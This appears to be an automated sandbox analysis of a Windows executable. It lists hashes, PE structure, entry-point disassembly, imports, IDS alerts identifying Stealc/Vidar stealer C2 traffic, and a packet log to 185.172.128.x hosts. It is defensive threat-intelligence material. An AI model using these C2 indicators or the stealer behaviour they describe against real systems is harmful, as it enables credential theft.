                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:wxfSIz4PAi.exe
                                                                                                                                                                                                                            File size:460'289 bytes
                                                                                                                                                                                                                            MD5:0a7871874dc7111b978e798f616211f9
                                                                                                                                                                                                                            SHA1:5f020eefc6d5da7efecd31bd3911911169d99021
                                                                                                                                                                                                                            SHA256:209765690105250f9d48d09d6bf6c4bbe22668e38b7b7e400b703e27bec45057
                                                                                                                                                                                                                            SHA512:19b5f8b0f64a0175494d7725875d57cf66a4c90a9fba74e0333f129e1386c6c2458ffc35f4774fad01e8fa2b2ccd59baf56dcc65a27e4f90d42005fe25fbda52
                                                                                                                                                                                                                            SSDEEP:12288:UguknPtI9oifhEvyzH3Ig4t5Ri3zg8kQAX6YK1:znFRiySH3Ilt5Ri3rkT6Ye
                                                                                                                                                                                                                            TLSH:A0A49D4372D1BC60E4260B325F1E9ADC772DF9618E65EB2B2248DE0F05B13B1D623729
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...p.xd...........
                                                                                                                                                                                                                            Icon Hash:453145454155610d
                                                                                                                                                                                                                            Entrypoint:0x4040e7
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6478C170 [Thu Jun 1 16:04:00 2023 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                                            Import Hash:edb3c0a48d18802f263453ac21caaefd
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            call 00007FF8C4D417BDh
                                                                                                                                                                                                                            jmp 00007FF8C4D3B445h
                                                                                                                                                                                                                            push 00000014h
                                                                                                                                                                                                                            push 00419050h
                                                                                                                                                                                                                            call 00007FF8C4D3D5A8h
                                                                                                                                                                                                                            call 00007FF8C4D40123h
                                                                                                                                                                                                                            movzx esi, ax
                                                                                                                                                                                                                            push 00000002h
                                                                                                                                                                                                                            call 00007FF8C4D41750h
                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                            mov eax, 00005A4Dh
                                                                                                                                                                                                                            cmp word ptr [00400000h], ax
                                                                                                                                                                                                                            je 00007FF8C4D3B446h
                                                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                                                            jmp 00007FF8C4D3B475h
                                                                                                                                                                                                                            mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                            cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                            jne 00007FF8C4D3B42Dh
                                                                                                                                                                                                                            mov ecx, 0000010Bh
                                                                                                                                                                                                                            cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                            jne 00007FF8C4D3B41Fh
                                                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                                                            cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                            jbe 00007FF8C4D3B44Bh
                                                                                                                                                                                                                            cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                            setne bl
                                                                                                                                                                                                                            mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                            call 00007FF8C4D3C7DCh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            jne 00007FF8C4D3B44Ah
                                                                                                                                                                                                                            push 0000001Ch
                                                                                                                                                                                                                            call 00007FF8C4D3B521h
                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                            call 00007FF8C4D4134Eh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            jne 00007FF8C4D3B44Ah
                                                                                                                                                                                                                            push 00000010h
                                                                                                                                                                                                                            call 00007FF8C4D3B510h
                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                            call 00007FF8C4D3FFEBh
                                                                                                                                                                                                                            and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                            call 00007FF8C4D3EAE2h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            jns 00007FF8C4D3B44Ah
                                                                                                                                                                                                                            push 0000001Bh
                                                                                                                                                                                                                            call 00007FF8C4D3B4F6h
                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                            call dword ptr [004130C4h]
                                                                                                                                                                                                                            mov dword ptr [04047030h], eax
                                                                                                                                                                                                                            call 00007FF8C4D417A4h
                                                                                                                                                                                                                            mov dword ptr [004595C0h], eax
                                                                                                                                                                                                                            call 00007FF8C4D413A1h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            jns 00007FF8C4D3B44Ah
                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                            • [ASM] VS2013 build 21005
                                                                                                                                                                                                                            • [ C ] VS2013 build 21005
                                                                                                                                                                                                                            • [C++] VS2013 build 21005
                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                            • [RES] VS2013 build 21005
                                                                                                                                                                                                                            • [LNK] VS2013 UPD5 build 40629
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x194a40x28.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c480000x16c8d.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c5f0000x144c.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x132000x38.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x189880x40.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x130000x190.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x118a30x11a00304dff5a0f4ac2df96f80a2894631a17False0.6099706338652482data6.693033275368329IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x130000x6d940x6e00ab0db6cf5e54ad996c80e914e5e99b67False0.3920099431818182data4.748929159078427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x1a0000x3c2d0480x3f600685b97e8aaad9b614ae9bf02af29567bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rsrc0x3c480000x16c8d0x16e00f671658fd2493c05b611c2bc122eeb61False0.42566384904371585data4.939222900407214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x3c5f0000x144c0x16009be4907c5d0910d16fe68da865190741False0.7253196022727273data6.35911031688205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x3c486b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.4130184331797235
                                                                                                                                                                                                                            RT_ICON0x3c48d800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.16410788381742739
                                                                                                                                                                                                                            RT_ICON0x3c4b3280x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.21365248226950354
                                                                                                                                                                                                                            RT_ICON0x3c4b7900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3694029850746269
                                                                                                                                                                                                                            RT_ICON0x3c4c6380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4535198555956679
                                                                                                                                                                                                                            RT_ICON0x3c4cee00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.4602534562211982
                                                                                                                                                                                                                            RT_ICON0x3c4d5a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.45736994219653176
                                                                                                                                                                                                                            RT_ICON0x3c4db100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2671161825726141
                                                                                                                                                                                                                            RT_ICON0x3c500b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.30863039399624764
                                                                                                                                                                                                                            RT_ICON0x3c511600x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3554964539007092
                                                                                                                                                                                                                            RT_ICON0x3c515c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5674307036247335
                                                                                                                                                                                                                            RT_ICON0x3c524700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5478339350180506
                                                                                                                                                                                                                            RT_ICON0x3c52d180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.6192196531791907
                                                                                                                                                                                                                            RT_ICON0x3c532800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4619294605809129
                                                                                                                                                                                                                            RT_ICON0x3c558280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.48874296435272047
                                                                                                                                                                                                                            RT_ICON0x3c568d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.4979508196721312
                                                                                                                                                                                                                            RT_ICON0x3c572580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.450354609929078
                                                                                                                                                                                                                            RT_ICON0x3c576c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4229744136460554
                                                                                                                                                                                                                            RT_ICON0x3c585680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.48194945848375453
                                                                                                                                                                                                                            RT_ICON0x3c58e100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5858294930875576
                                                                                                                                                                                                                            RT_ICON0x3c594d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4985549132947977
                                                                                                                                                                                                                            RT_ICON0x3c59a400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.47116182572614107
                                                                                                                                                                                                                            RT_ICON0x3c5bfe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.48592870544090055
                                                                                                                                                                                                                            RT_ICON0x3c5d0900x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.5008196721311475
                                                                                                                                                                                                                            RT_ICON0x3c5da180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5478723404255319
                                                                                                                                                                                                                            RT_STRING0x3c5de800x428data0.45206766917293234
                                                                                                                                                                                                                            RT_STRING0x3c5e2a80x3c8data0.4628099173553719
                                                                                                                                                                                                                            RT_GROUP_ICON0x3c5e6700x68data0.7115384615384616
                                                                                                                                                                                                                            RT_GROUP_ICON0x3c5e6d80x68data0.6826923076923077
                                                                                                                                                                                                                            RT_GROUP_ICON0x3c5e7400x30data0.9375
                                                                                                                                                                                                                            RT_GROUP_ICON0x3c5e7700x76data0.6779661016949152
                                                                                                                                                                                                                            RT_VERSION0x3c5e7e80x244data0.5396551724137931
                                                                                                                                                                                                                            RT_MANIFEST0x3c5ea2c0x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            KERNEL32.dllGetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, GetExitCodeThread, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, GetOEMCP, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, HeapAlloc, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW
                                                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            04/26/24-23:08:52.240583TCP2856233ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            04/26/24-23:09:00.358800TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                            04/26/24-23:08:57.572292TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                            04/26/24-23:08:59.654524TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                            04/26/24-23:09:00.002826TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                            04/26/24-23:09:00.005433TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Apr 26, 2024 23:08:48.121798992 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                            Apr 26, 2024 23:08:48.793616056 CEST49678443192.168.2.4104.46.162.224
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.000494957 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.240346909 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.240487099 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.240582943 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.480269909 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:53.904736996 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:53.949850082 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.130351067 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.612963915 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.853843927 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.854088068 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.854088068 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.094258070 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.095015049 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.096709013 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.109692097 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.349553108 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.349673986 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.363866091 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.603794098 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604291916 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604312897 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604330063 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604347944 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604408026 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604412079 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604465961 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604506016 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604549885 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604651928 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604732990 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604773045 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604782104 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604845047 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604895115 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845791101 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845819950 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845838070 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845873117 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845890045 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845909119 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845927000 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845943928 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846025944 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846033096 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846033096 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846033096 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846045971 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846101046 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846182108 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846199989 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846220016 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846255064 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846435070 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846452951 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846470118 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846498966 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846512079 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846573114 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846591949 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846653938 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846760035 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846776962 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.846826077 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087003946 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087086916 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087109089 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087163925 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087241888 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087260008 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087284088 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087301970 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087310076 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087327957 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087389946 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087408066 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087430000 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087443113 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087495089 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087577105 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087594032 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087611914 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087629080 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087646961 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087646961 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087666035 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087667942 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087685108 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087703943 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087721109 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087721109 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087743044 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087752104 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087759972 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087778091 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087795973 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087798119 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087814093 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087821960 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087832928 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087852001 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087865114 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087868929 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087886095 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087897062 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087903976 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087920904 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087934971 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087939024 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087959051 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087965012 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087977886 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.087996006 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088004112 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088015079 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088032961 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088040113 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088052034 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088069916 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088077068 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088087082 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:08:56.088114977 CEST4973280192.168.2.4185.172.128.59
